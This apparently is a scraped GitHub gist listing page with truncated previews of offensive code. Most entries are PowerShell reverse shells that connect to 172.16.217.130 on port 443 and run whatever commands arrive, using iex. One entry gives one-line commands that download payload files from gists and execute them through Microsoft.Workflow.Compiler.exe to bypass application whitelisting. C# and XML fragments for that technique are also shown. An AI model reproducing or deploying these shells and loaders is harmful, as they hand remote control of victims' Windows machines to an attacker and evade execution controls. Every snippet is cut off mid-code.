This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function cln{if($c.Connected -eq $true){$c.Close()}; | |
if($p.ExitCode -ne $null){$p.Close()}; | |
exit | |
}; | |
$c=New-Object System.Net.Sockets.TcpClient; | |
$c.Connect('172.16.217.130',443); | |
if($c.Connected -ne $true){cln}; | |
$s=$c.GetStream(); | |
$b=New-Object System.Byte[] $c.ReceiveBufferSize; | |
$p=New-Object System.Diagnostics.Process; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$client = New-Object System.Net.Sockets.TCPClient('172.16.217.130',443); | |
$stream = $client.GetStream(); | |
[byte[]]$bytes = 0..65535|%{0}; | |
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; | |
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); | |
$sendback = (iex $data 2>&1 | Out-String); | |
$result = $sendback + 'PS '+ (pwd).Path + '> '; | |
$sendbyte = ([text.encoding]::ASCII).GetBytes($result); | |
$stream.Write($sendbyte,0,$sendbyte.Length); | |
$stream.Flush() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$socket = new-object System.Net.Sockets.TcpClient("172.16.217.130",443); | |
if($socket -eq $null){exit 1} | |
$stream = $socket.GetStream(); | |
$writer = new-object System.IO.StreamWriter($stream); | |
$buffer = new-object System.Byte[] 1024; | |
$encoding = new-object System.Text.AsciiEncoding; | |
do{ | |
$writer.Write("[Bank_Security]> "); | |
$writer.Flush(); | |
$read = $null; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$sm=(New-Object Net.Sockets.TCPClient('172.16.217.130',443)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$client = New-Object System.Net.Sockets.TCPClient('172.16.217.130',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Text; | |
using System.IO; | |
using System.Diagnostics; | |
using System.ComponentModel; | |
using System.Linq; | |
using System.Net; | |
using System.Net.Sockets; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
64bit: | |
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell | |
32bit: | |
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsof |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Text; | |
using System.IO; | |
using System.Diagnostics; | |
using System.ComponentModel; | |
using System.Net; | |
using System.Net.Sockets; | |
using System.Workflow.Activities; | |
public class Program : SequentialWorkflowActivity |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?> | |
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler"> | |
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays"> | |
<d2p1:string>Rev.Shell</d2p1:string> | |
</files> | |
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler"> | |
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | |
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | |
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName> | |
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> |